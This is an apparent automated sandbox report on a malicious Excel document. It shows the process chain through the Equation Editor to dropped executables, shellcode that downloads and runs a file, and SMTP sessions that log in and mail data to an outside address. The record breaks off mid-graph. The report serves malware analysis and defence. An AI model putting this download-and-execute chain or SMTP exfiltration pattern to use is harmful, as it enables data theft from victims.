                                  2023-01-18 08:13:45 UTC416INData Raw: 46 cb 44 18 e5 c0 38 42 ba ed 6e a7 26 87 2f a7 7f ec 83 1d b1 5c e2 84 50 37 97 b5 4b 33 46 8d 10 aa 28 f6 15 d4 b3 58 8e f5 ec 15 df bf c1 fd 75 f6 43 b9 57 e8 26 3a 0d ee 4e 35 71 72 f2 ad ec 89 55 ec 73 d1 c3 d2 1c 4e e1 bd 62 69 8b 09 21 a0 5b 11 76 d0 c8 eb ca c8 79 cb 15 ae 51 08 17 54 0f 73 d3 c5 d4 1a f3 44 20 25 da 90 3a 94 29 3d 8a de 84 65 c2 91 f7 99 ff 27 29 5f 17 0b 71 e6 96 8f ee 18 7a 21 ca a4 4c d8 76 0b c1 c0 d7 37 d6 6c c0 50 9e b9 3d 7c 54 e1 d8 30 f6 1e 54 59 24 87 da 25 67 8f 6f 3c 89 fc b4 a3 db a6 14 60 1a 7d fa ba fd 10 5f 11 37 b2 5e cf 47 9d 39 6d ff 94 25 07 25 42 50 94 0b f5 d3 bd 7c 2b 79 5e 04 fe 3b 26 ce c3 45 a4 1e 41 84 7f 76 f4 67 b9 de 39 a8 bb 01 61 ca 2a bd 49 f3 8e ef 1c 4b fe 8c 52 4a 19 9e 6c ad 69 dc d6 13 d2 47
                                  Data Ascii: FD8Bn&/\P7K3F(XuCW&:N5qrUsNbi![vyQTsD %:)=e')_qz!Lv7lP=|T0TY$%go<`}_7^G9m%%BP|+y^;&EAvg9a*IKRJliG


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  1192.168.2.224917564.185.227.155443C:\Users\user\AppData\Local\Temp\lyebkz.exe
                                  TimestampkBytes transferredDirectionData
                                  2023-01-18 08:13:51 UTC428OUTGET / HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                  Host: api.ipify.org
                                  Connection: Keep-Alive
                                  2023-01-18 08:13:51 UTC428INHTTP/1.1 200 OK
                                  Access-Control-Allow-Credentials: true
                                  Access-Control-Allow-Origin: *
                                  Content-Length: 10
                                  Content-Type: text/plain
                                  Date: Wed, 18 Jan 2023 08:13:51 GMT
                                  Vary: Origin
                                  Connection: close
                                  2023-01-18 08:13:51 UTC428INData Raw: 38 34 2e 31 37 2e 35 32 2e 35
                                  Data Ascii: 84.17.52.5


                                  SMTP Packets

                                  TimestampSource PortDest PortSource IPDest IPCommands
                                  Jan 18, 2023 09:14:09.816689014 CET587491765.249.163.12192.168.2.22220 box.localdomain ESMTP Postfix (Debian/GNU)
                                  Jan 18, 2023 09:14:09.819118023 CET49176587192.168.2.225.249.163.12EHLO 813435
                                  Jan 18, 2023 09:14:09.862719059 CET587491775.249.163.12192.168.2.22220 box.localdomain ESMTP Postfix (Debian/GNU)
                                  Jan 18, 2023 09:14:09.863631964 CET49177587192.168.2.225.249.163.12EHLO 813435
                                  Jan 18, 2023 09:14:09.925865889 CET587491765.249.163.12192.168.2.22250-box.localdomain
                                  250-PIPELINING
                                  250-SIZE 10240000
                                  250-VRFY
                                  250-ETRN
                                  250-STARTTLS
                                  250-AUTH PLAIN LOGIN
                                  250-AUTH=PLAIN LOGIN
                                  250-ENHANCEDSTATUSCODES
                                  250-8BITMIME
                                  250-DSN
                                  250-SMTPUTF8
                                  250 CHUNKING
                                  Jan 18, 2023 09:14:09.927025080 CET49176587192.168.2.225.249.163.12AUTH login Z21AYW9zeGVyLmNvbQ==
                                  Jan 18, 2023 09:14:09.970180988 CET587491775.249.163.12192.168.2.22250-box.localdomain
                                  250-PIPELINING
                                  250-SIZE 10240000
                                  250-VRFY
                                  250-ETRN
                                  250-STARTTLS
                                  250-AUTH PLAIN LOGIN
                                  250-AUTH=PLAIN LOGIN
                                  250-ENHANCEDSTATUSCODES
                                  250-8BITMIME
                                  250-DSN
                                  250-SMTPUTF8
                                  250 CHUNKING
                                  Jan 18, 2023 09:14:09.970788002 CET49177587192.168.2.225.249.163.12AUTH login Z21AYW9zeGVyLmNvbQ==
                                  Jan 18, 2023 09:14:10.033795118 CET587491765.249.163.12192.168.2.22334 UGFzc3dvcmQ6
                                  Jan 18, 2023 09:14:10.077316999 CET587491775.249.163.12192.168.2.22334 UGFzc3dvcmQ6
                                  Jan 18, 2023 09:14:10.141030073 CET587491765.249.163.12192.168.2.22235 2.7.0 Authentication successful
                                  Jan 18, 2023 09:14:10.141267061 CET49176587192.168.2.225.249.163.12MAIL FROM:<gm@aosxer.com>
                                  Jan 18, 2023 09:14:10.184400082 CET587491775.249.163.12192.168.2.22235 2.7.0 Authentication successful
                                  Jan 18, 2023 09:14:10.184632063 CET49177587192.168.2.225.249.163.12MAIL FROM:<gm@aosxer.com>
                                  Jan 18, 2023 09:14:10.249211073 CET587491765.249.163.12192.168.2.22250 2.1.0 Ok
                                  Jan 18, 2023 09:14:10.249617100 CET49176587192.168.2.225.249.163.12RCPT TO:<reportcard@aosxer.com>
                                  Jan 18, 2023 09:14:10.297579050 CET587491775.249.163.12192.168.2.22250 2.1.0 Ok
                                  Jan 18, 2023 09:14:10.298491001 CET49177587192.168.2.225.249.163.12RCPT TO:<reportcard@aosxer.com>
                                  Jan 18, 2023 09:14:10.362848997 CET587491765.249.163.12192.168.2.22250 2.1.5 Ok
                                  Jan 18, 2023 09:14:10.363501072 CET49176587192.168.2.225.249.163.12DATA
                                  Jan 18, 2023 09:14:10.411957026 CET587491775.249.163.12192.168.2.22250 2.1.5 Ok
                                  Jan 18, 2023 09:14:10.412193060 CET49177587192.168.2.225.249.163.12DATA
                                  Jan 18, 2023 09:14:10.470576048 CET587491765.249.163.12192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                  Jan 18, 2023 09:14:10.518968105 CET587491775.249.163.12192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                  Jan 18, 2023 09:14:11.326529980 CET49177587192.168.2.225.249.163.12.
                                  Jan 18, 2023 09:14:11.329830885 CET587491765.249.163.12192.168.2.22250 2.0.0 Ok: queued as F0388140331
                                  Jan 18, 2023 09:14:11.489886999 CET587491775.249.163.12192.168.2.22250 2.0.0 Ok: queued as 080C91418C8
                                  Jan 18, 2023 09:14:43.660346985 CET49176587192.168.2.225.249.163.12QUIT
                                  Jan 18, 2023 09:14:43.660383940 CET49177587192.168.2.225.249.163.12QUIT
                                  Jan 18, 2023 09:14:43.767231941 CET587491775.249.163.12192.168.2.22221 2.0.0 Bye
                                  Jan 18, 2023 09:14:43.767863989 CET587491765.249.163.12192.168.2.22221 2.0.0 Bye
                                  Jan 18, 2023 09:14:44.093992949 CET587491785.249.163.12192.168.2.22220 box.localdomain ESMTP Postfix (Debian/GNU)
                                  Jan 18, 2023 09:14:44.094849110 CET49178587192.168.2.225.249.163.12EHLO 813435
                                  Jan 18, 2023 09:14:44.172585964 CET587491795.249.163.12192.168.2.22220 box.localdomain ESMTP Postfix (Debian/GNU)
                                  Jan 18, 2023 09:14:44.173003912 CET49179587192.168.2.225.249.163.12EHLO 813435
                                  Jan 18, 2023 09:14:44.201376915 CET587491785.249.163.12192.168.2.22250-box.localdomain
                                  250-PIPELINING
                                  250-SIZE 10240000
                                  250-VRFY
                                  250-ETRN
                                  250-STARTTLS
                                  250-AUTH PLAIN LOGIN
                                  250-AUTH=PLAIN LOGIN
                                  250-ENHANCEDSTATUSCODES
                                  250-8BITMIME
                                  250-DSN
                                  250-SMTPUTF8
                                  250 CHUNKING
                                  Jan 18, 2023 09:14:44.201699018 CET49178587192.168.2.225.249.163.12AUTH login Z21AYW9zeGVyLmNvbQ==
                                  Jan 18, 2023 09:14:44.282885075 CET587491795.249.163.12192.168.2.22250-box.localdomain
                                  250-PIPELINING
                                  250-SIZE 10240000
                                  250-VRFY
                                  250-ETRN
                                  250-STARTTLS
                                  250-AUTH PLAIN LOGIN
                                  250-AUTH=PLAIN LOGIN
                                  250-ENHANCEDSTATUSCODES
                                  250-8BITMIME
                                  250-DSN
                                  250-SMTPUTF8
                                  250 CHUNKING
                                  Jan 18, 2023 09:14:44.283142090 CET49179587192.168.2.225.249.163.12AUTH login Z21AYW9zeGVyLmNvbQ==
                                  Jan 18, 2023 09:14:44.308166981 CET587491785.249.163.12192.168.2.22334 UGFzc3dvcmQ6
                                  Jan 18, 2023 09:14:44.393027067 CET587491795.249.163.12192.168.2.22334 UGFzc3dvcmQ6
                                  Jan 18, 2023 09:14:44.415210009 CET587491785.249.163.12192.168.2.22235 2.7.0 Authentication successful
                                  Jan 18, 2023 09:14:44.415443897 CET49178587192.168.2.225.249.163.12MAIL FROM:<gm@aosxer.com>
                                  Jan 18, 2023 09:14:44.503458977 CET587491795.249.163.12192.168.2.22235 2.7.0 Authentication successful
                                  Jan 18, 2023 09:14:44.504333019 CET49179587192.168.2.225.249.163.12MAIL FROM:<gm@aosxer.com>
                                  Jan 18, 2023 09:14:44.522053003 CET587491785.249.163.12192.168.2.22250 2.1.0 Ok
                                  Jan 18, 2023 09:14:44.522304058 CET49178587192.168.2.225.249.163.12RCPT TO:<reportcard@aosxer.com>
                                  Jan 18, 2023 09:14:44.614322901 CET587491795.249.163.12192.168.2.22250 2.1.0 Ok
                                  Jan 18, 2023 09:14:44.614756107 CET49179587192.168.2.225.249.163.12RCPT TO:<reportcard@aosxer.com>
                                  Jan 18, 2023 09:14:44.629196882 CET587491785.249.163.12192.168.2.22250 2.1.5 Ok
                                  Jan 18, 2023 09:14:44.629569054 CET49178587192.168.2.225.249.163.12DATA
                                  Jan 18, 2023 09:14:44.725070953 CET587491795.249.163.12192.168.2.22250 2.1.5 Ok
                                  Jan 18, 2023 09:14:44.725398064 CET49179587192.168.2.225.249.163.12DATA
                                  Jan 18, 2023 09:14:44.735939026 CET587491785.249.163.12192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                  Jan 18, 2023 09:14:44.835278034 CET587491795.249.163.12192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                  Jan 18, 2023 09:14:45.546597958 CET49178587192.168.2.225.249.163.12.
                                  Jan 18, 2023 09:14:45.661443949 CET49179587192.168.2.225.249.163.12.
                                  Jan 18, 2023 09:14:45.704210997 CET587491785.249.163.12192.168.2.22250 2.0.0 Ok: queued as 3D2CE140331
                                  Jan 18, 2023 09:14:45.820247889 CET587491795.249.163.12192.168.2.22250 2.0.0 Ok: queued as 53CB01418C8

                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:09:13:19
                                  Start date:18/01/2023
                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                  Imagebase:0x13fd20000
                                  File size:28253536 bytes
                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:2
                                  Start time:09:13:40
                                  Start date:18/01/2023
                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                  Imagebase:0x400000
                                  File size:543304 bytes
                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:5
                                  Start time:09:13:52
                                  Start date:18/01/2023
                                  Path:C:\Users\user\AppData\Roaming\word.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\AppData\Roaming\word.exe
                                  Imagebase:0x400000
                                  File size:437857 bytes
                                  MD5 hash:1CEC9C1FA633D554029A6402174612D1
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 36%, ReversingLabs
                                  Reputation:low

                                  General

                                  Target ID:6
                                  Start time:09:13:52
                                  Start date:18/01/2023
                                  Path:C:\Users\user\AppData\Local\Temp\lyebkz.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Local\Temp\lyebkz.exe" C:\Users\user\AppData\Local\Temp\ektmwwvwm.tx
                                  Imagebase:0x400000
                                  File size:102400 bytes
                                  MD5 hash:41467466B6E727C3C65D9501F6A23A04
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low

                                  General

                                  Target ID:7
                                  Start time:09:13:53
                                  Start date:18/01/2023
                                  Path:C:\Users\user\AppData\Local\Temp\lyebkz.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\AppData\Local\Temp\lyebkz.exe
                                  Imagebase:0x400000
                                  File size:102400 bytes
                                  MD5 hash:41467466B6E727C3C65D9501F6A23A04
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Reputation:low

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:34.1%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:86.2%
                                    Total number of Nodes:29
                                    Total number of Limit Nodes:1
                                    execution_graph 195 3674c4f LoadLibraryW 206 3674c77 195->206 197 3674c64 198 3674c88 URLDownloadToFileW 197->198 220 3674ce0 URLDownloadToFileW 197->220 216 3674cfd 198->216 207 3674c7a 206->207 208 3674ce0 6 API calls 207->208 209 3674c88 URLDownloadToFileW 208->209 211 3674cfd 5 API calls 209->211 212 3674ce9 211->212 213 3674d60 212->213 226 3674d2b 212->226 213->197 215 3674d23 217 3674d00 216->217 218 3674d2b 5 API calls 217->218 219 3674d23 218->219 221 3674cfd 5 API calls 220->221 222 3674ce9 220->222 221->222 223 3674d60 222->223 224 3674d2b 5 API calls 222->224 223->198 225 3674d23 224->225 227 3674d2e WinExec 226->227 232 3674d4b 227->232 229 3674d3f 230 3674d4e ExitProcess GetPEB 229->230 231 3674d60 229->231 230->231 231->215 233 3674d4e ExitProcess GetPEB 232->233 234 3674d60 233->234 234->229

                                    Callgraph

                                    • Executed
                                    • Not Executed
                                    • Opacity -> Relevance
                                    • Disassembly available
                                    callgraph 0 Function_03674C77 3 Function_03674CE0 0->3 5 Function_03674CFD 0->5 7 Function_03674D2B 0->7 9 Function_03674D7A 0->9 1 Function_035FB13A 2 Function_0360BCF5 3->5 3->7 3->9 4 Function_03674C4F 4->0 4->3 4->5 4->7 4->9 5->7 6 Function_03674D4B 6->9 7->6 7->9 8 Function_03674DCB

                                    Executed Functions

                                    Function 03674C4F Relevance: 3.1, APIs: 2, Instructions: 90libraryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 3674c4f-3674c82 LoadLibraryW call 3674c77 4 3674c88-3674ce4 URLDownloadToFileW call 3674cfd 0->4 5 3674c83 call 3674ce0 0->5 10 3674ce9-3674cf4 4->10 5->4 11 3674cf6 10->11 12 3674d62-3674d67 10->12 13 3674d61 11->13 14 3674cf8-3674cf9 11->14 15 3674d8d-3674d91 12->15 16 3674d69-3674d6d call 3674d7a 12->16 13->12 18 3674d6f-3674d71 14->18 19 3674cfb-3674d24 call 3674d2b 14->19 17 3674d94 15->17 16->18 24 3674d96-3674d9a 17->24 25 3674d9c-3674da0 17->25 22 3674d73-3674d77 18->22 23 3674d60 18->23 23->12 24->25 26 3674da8-3674daf 24->26 27 3674db5-3674db7 25->27 28 3674da2-3674da6 25->28 30 3674db3 26->30 31 3674db1 26->31 32 3674dc7-3674dc8 27->32 28->26 28->27 30->27 34 3674db9-3674dc2 30->34 31->27 34->32 36 3674d86-3674d89 34->36 37 3674dc4 36->37 38 3674d8b-3674d8e 36->38 37->32 38->34 39 3674d90 38->39 39->17
                                    APIs
                                    • LoadLibraryW.KERNEL32 ref: 03674C5D
                                      • Part of subcall function 03674C77: URLDownloadToFileW.URLMON(00000000,03674C88,?,00000000,00000000), ref: 03674CE2
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.977965535.00000000035D0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_35d0000_EQNEDT32.jbxd
                                    Similarity
                                    • API ID: DownloadFileLibraryLoad
                                    • String ID:
                                    • API String ID: 2776762486-0
                                    • Opcode ID: 37cfb0a514d9c8ef2a2b92486a98e6637479bdee4bf1a7f76fafcb8d37899b62
                                    • Instruction ID: 66269398fd19df2dc89208f27b3cd8e8bb3154cf693dd64cade5426bd3db4a31
                                    • Opcode Fuzzy Hash: 37cfb0a514d9c8ef2a2b92486a98e6637479bdee4bf1a7f76fafcb8d37899b62
                                    • Instruction Fuzzy Hash: 883178A144C3C52FC713D7700D6EB55BF646B93214F5DCACEA4C50E0D3ABA4A106C657
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03674D2B Relevance: 3.0, APIs: 2, Instructions: 46processCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 40 3674d2b-3674d42 WinExec call 3674d4b 45 3674d94 40->45 46 3674d44 40->46 47 3674d96-3674d9a 45->47 48 3674d9c-3674da0 45->48 49 3674d46-3674d5d ExitProcess GetPEB 46->49 50 3674db5-3674db7 46->50 47->48 51 3674da8-3674daf 47->51 48->50 52 3674da2-3674da6 48->52 60 3674d60-3674d67 49->60 53 3674dc7-3674dc8 50->53 55 3674db3 51->55 56 3674db1 51->56 52->50 52->51 55->50 57 3674db9-3674dc2 55->57 56->50 57->53 59 3674d86-3674d89 57->59 62 3674dc4 59->62 63 3674d8b-3674d8e 59->63 65 3674d8d-3674d91 60->65 66 3674d69-3674d71 call 3674d7a 60->66 62->53 63->57 64 3674d90 63->64 64->45 65->45 66->60 70 3674d73-3674d77 66->70
                                    APIs
                                    • WinExec.KERNEL32(?,00000001,?,03674D23,?,03674CE9), ref: 03674D38
                                      • Part of subcall function 03674D4B: ExitProcess.KERNEL32(00000000,?,03674D3F,?,03674D23,?,03674CE9), ref: 03674D50
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.977965535.00000000035D0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_35d0000_EQNEDT32.jbxd
                                    Similarity
                                    • API ID: ExecExitProcess
                                    • String ID:
                                    • API String ID: 4112423671-0
                                    • Opcode ID: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
                                    • Instruction ID: 20f6adc7c398fa0d217fec8234339324c474b9d7e9f754a5fff1287a09177e42
                                    • Opcode Fuzzy Hash: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
                                    • Instruction Fuzzy Hash: DAF0285990434251C733F36A896D7FBBBA5DF51310FCF8957D8C004189DD5484C3C619
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03674C77 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 71 3674c77-3674ce4 call 3674ce0 URLDownloadToFileW call 3674cfd 79 3674ce9-3674cf4 71->79 80 3674cf6 79->80 81 3674d62-3674d67 79->81 82 3674d61 80->82 83 3674cf8-3674cf9 80->83 84 3674d8d-3674d91 81->84 85 3674d69-3674d6d call 3674d7a 81->85 82->81 87 3674d6f-3674d71 83->87 88 3674cfb-3674d24 call 3674d2b 83->88 86 3674d94 84->86 85->87 93 3674d96-3674d9a 86->93 94 3674d9c-3674da0 86->94 91 3674d73-3674d77 87->91 92 3674d60 87->92 92->81 93->94 95 3674da8-3674daf 93->95 96 3674db5-3674db7 94->96 97 3674da2-3674da6 94->97 99 3674db3 95->99 100 3674db1 95->100 101 3674dc7-3674dc8 96->101 97->95 97->96 99->96 103 3674db9-3674dc2 99->103 100->96 103->101 105 3674d86-3674d89 103->105 106 3674dc4 105->106 107 3674d8b-3674d8e 105->107 106->101 107->103 108 3674d90 107->108 108->86
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.977965535.00000000035D0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_35d0000_EQNEDT32.jbxd
                                    Similarity
                                    • API ID: DownloadFile
                                    • String ID:
                                    • API String ID: 1407266417-0
                                    • Opcode ID: 7926e90553058f0f899509944689f18f24de39ed39586c4cd8a6785f78fcff95
                                    • Instruction ID: e09f5c9802a683788987b567c9a45dc8352bfc038c54228208a4dcceaf629dbd
                                    • Opcode Fuzzy Hash: 7926e90553058f0f899509944689f18f24de39ed39586c4cd8a6785f78fcff95
                                    • Instruction Fuzzy Hash: DA2165A184C3C12FC723DB700C6EB55BF606B83610F59CACEA5C50E0D3EBA99106C257
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03674CE0 Relevance: 1.6, APIs: 1, Instructions: 58filenetworkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 109 3674ce0-3674ce2 URLDownloadToFileW 110 3674ce9-3674cf4 109->110 111 3674ce4 call 3674cfd 109->111 112 3674cf6 110->112 113 3674d62-3674d67 110->113 111->110 114 3674d61 112->114 115 3674cf8-3674cf9 112->115 116 3674d8d-3674d91 113->116 117 3674d69-3674d6d call 3674d7a 113->117 114->113 119 3674d6f-3674d71 115->119 120 3674cfb-3674d24 call 3674d2b 115->120 118 3674d94 116->118 117->119 125 3674d96-3674d9a 118->125 126 3674d9c-3674da0 118->126 123 3674d73-3674d77 119->123 124 3674d60 119->124 124->113 125->126 127 3674da8-3674daf 125->127 128 3674db5-3674db7 126->128 129 3674da2-3674da6 126->129 131 3674db3 127->131 132 3674db1 127->132 133 3674dc7-3674dc8 128->133 129->127 129->128 131->128 135 3674db9-3674dc2 131->135 132->128 135->133 137 3674d86-3674d89 135->137 138 3674dc4 137->138 139 3674d8b-3674d8e 137->139 138->133 139->135 140 3674d90 139->140 140->118
                                    APIs
                                    • URLDownloadToFileW.URLMON(00000000,03674C88,?,00000000,00000000), ref: 03674CE2
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.977965535.00000000035D0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_35d0000_EQNEDT32.jbxd
                                    Similarity
                                    • API ID: DownloadFile
                                    • String ID:
                                    • API String ID: 1407266417-0
                                    • Opcode ID: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
                                    • Instruction ID: 64e116e7afb6c0ecc750273ab63017edf4def4978f95fc1a7ed5fd9ea9ad3b7f
                                    • Opcode Fuzzy Hash: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
                                    • Instruction Fuzzy Hash: AC118C3150834266C723E655895DBAAF7A4EFC2710FCAC15AE5D04D2C9FBA0D843C21A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03674D4B Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 141 3674d4b-3674d5d ExitProcess GetPEB 143 3674d60-3674d67 141->143 145 3674d8d-3674d91 143->145 146 3674d69-3674d71 call 3674d7a 143->146 147 3674d94 145->147 146->143 156 3674d73-3674d77 146->156 150 3674d96-3674d9a 147->150 151 3674d9c-3674da0 147->151 150->151 153 3674da8-3674daf 150->153 154 3674db5-3674db7 151->154 155 3674da2-3674da6 151->155 157 3674db3 153->157 158 3674db1 153->158 159 3674dc7-3674dc8 154->159 155->153 155->154 157->154 160 3674db9-3674dc2 157->160 158->154 160->159 161 3674d86-3674d89 160->161 162 3674dc4 161->162 163 3674d8b-3674d8e 161->163 162->159 163->160 164 3674d90 163->164 164->147
                                    APIs
                                    • ExitProcess.KERNEL32(00000000,?,03674D3F,?,03674D23,?,03674CE9), ref: 03674D50
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.977965535.00000000035D0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_35d0000_EQNEDT32.jbxd
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    • Opcode ID: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
                                    • Instruction ID: 2281e1d4e4b0fc3618fe51c8034974ea8d7b3fe481436250f891ac1f04901cab
                                    • Opcode Fuzzy Hash: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
                                    • Instruction Fuzzy Hash: 9AD082302016029BD202EB11CD84F27F32AFFC4610F14C228E0044A209CB30E881CAA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Execution Graph

                                    Execution Coverage:15.6%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:16.4%
                                    Total number of Nodes:1385
                                    Total number of Limit Nodes:25
                                    execution_graph 3224 403640 SetErrorMode GetVersionExW 3225 403692 GetVersionExW 3224->3225 3226 4036ca 3224->3226 3225->3226 3227 403723 3226->3227 3228 406a35 5 API calls 3226->3228 3314 4069c5 GetSystemDirectoryW 3227->3314 3228->3227 3230 403739 lstrlenA 3230->3227 3231 403749 3230->3231 3317 406a35 GetModuleHandleA 3231->3317 3234 406a35 5 API calls 3235 403757 3234->3235 3236 406a35 5 API calls 3235->3236 3237 403763 #17 OleInitialize SHGetFileInfoW 3236->3237 3323 406668 lstrcpynW 3237->3323 3240 4037b0 GetCommandLineW 3324 406668 lstrcpynW 3240->3324 3242 4037c2 3325 405f64 3242->3325 3245 4038f7 3246 40390b GetTempPathW 3245->3246 3329 40360f 3246->3329 3248 403923 3250 403927 GetWindowsDirectoryW lstrcatW 3248->3250 3251 40397d DeleteFileW 3248->3251 3249 405f64 CharNextW 3253 4037f9 3249->3253 3254 40360f 12 API calls 3250->3254 3339 4030d0 GetTickCount GetModuleFileNameW 3251->3339 3253->3245 3253->3249 3258 4038f9 3253->3258 3256 403943 3254->3256 3255 403990 3259 403b6c ExitProcess OleUninitialize 3255->3259 3261 403a45 3255->3261 3268 405f64 CharNextW 3255->3268 3256->3251 3257 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3256->3257 3260 40360f 12 API calls 3257->3260 3425 406668 lstrcpynW 3258->3425 3263 403b91 3259->3263 3264 403b7c 3259->3264 3267 403975 3260->3267 3369 403d17 3261->3369 3265 403b99 GetCurrentProcess OpenProcessToken 3263->3265 3266 403c0f ExitProcess 3263->3266 3479 405cc8 3264->3479 3271 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 3265->3271 3272 403bdf 3265->3272 3267->3251 3267->3259 3283 4039b2 3268->3283 3271->3272 3276 406a35 5 API calls 3272->3276 3273 403a54 3273->3259 3279 403be6 3276->3279 3277 403a1b 3426 40603f 3277->3426 3278 403a5c 3442 405c33 3278->3442 3281 403bfb ExitWindowsEx 3279->3281 3285 403c08 3279->3285 3281->3266 3281->3285 3283->3277 3283->3278 3483 40140b 3285->3483 3288 403a72 lstrcatW 3289 403a7d lstrcatW lstrcmpiW 3288->3289 3289->3273 3290 403a9d 3289->3290 3292 403aa2 3290->3292 3293 403aa9 3290->3293 3445 405b99 CreateDirectoryW 3292->3445 3450 405c16 CreateDirectoryW 3293->3450 3294 403a3a 3441 406668 lstrcpynW 3294->3441 3299 403aae SetCurrentDirectoryW 3300 403ac0 3299->3300 3301 403acb 3299->3301 3453 406668 lstrcpynW 3300->3453 3454 406668 lstrcpynW 3301->3454 3306 403b19 CopyFileW 3310 403ad8 3306->3310 3307 403b63 3309 406428 36 API calls 3307->3309 3309->3273 3310->3307 3311 4066a5 17 API calls 3310->3311 3313 403b4d CloseHandle 3310->3313 3455 4066a5 3310->3455 3472 406428 MoveFileExW 3310->3472 3476 405c4b CreateProcessW 3310->3476 3311->3310 3313->3310 3315 4069e7 wsprintfW LoadLibraryExW 3314->3315 3315->3230 3318 406a51 3317->3318 3319 406a5b GetProcAddress 3317->3319 3320 4069c5 3 API calls 3318->3320 3321 403750 3319->3321 3322 406a57 3320->3322 3321->3234 3322->3319 3322->3321 3323->3240 3324->3242 3326 405f6a 3325->3326 3327 4037e8 CharNextW 3326->3327 3328 405f71 CharNextW 3326->3328 3327->3253 3328->3326 3486 4068ef 3329->3486 3331 403625 3331->3248 3332 40361b 3332->3331 3495 405f37 lstrlenW CharPrevW 3332->3495 3335 405c16 2 API calls 3336 403633 3335->3336 3498 406187 3336->3498 3502 406158 GetFileAttributesW CreateFileW 3339->3502 3341 403113 3368 403120 3341->3368 3503 406668 lstrcpynW 3341->3503 3343 403136 3504 405f83 lstrlenW 3343->3504 3347 403147 GetFileSize 3348 403241 3347->3348 3367 40315e 3347->3367 3509 40302e 3348->3509 3352 403286 GlobalAlloc 3355 40329d 3352->3355 3354 4032de 3356 40302e 32 API calls 3354->3356 3359 406187 2 API calls 3355->3359 3356->3368 3357 403267 3358 4035e2 ReadFile 3357->3358 3360 403272 3358->3360 3362 4032ae CreateFileW 3359->3362 3360->3352 3360->3368 3361 40302e 32 API calls 3361->3367 3363 